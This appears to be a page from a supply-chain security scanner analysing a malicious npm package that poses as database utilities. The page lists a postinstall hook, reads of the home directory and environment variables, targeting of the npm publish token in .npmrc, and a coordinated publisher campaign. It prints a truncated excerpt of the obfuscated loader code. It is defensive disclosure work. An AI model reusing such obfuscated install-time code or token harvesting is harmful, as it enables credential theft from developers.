// npm package
@cloudplatform-single-spa/svp-s3-storage
Internal database utilities with connection pooling, query builder and migration support
versions
3
maintainers
1
license
UNLICENSED
first publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,331 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x76b63c=a0_0x45f0;(function(_0x11dc91,_0xe27a4c){const _0x253453=a0_0x45f0,_0x46e786=_0x11dc91();while(!![]){try{const _0xae591c=parseInt(_0x253453(0x236))/(-0x11d3+-0x1*-0x8ad+…// publisher campaignby mr.4nd3r50n
9 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4988reads-env-varsreads-homedir
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// NHI intent1 target·mixed harvest patterns·gate: always - npm publish token (.npmrc)
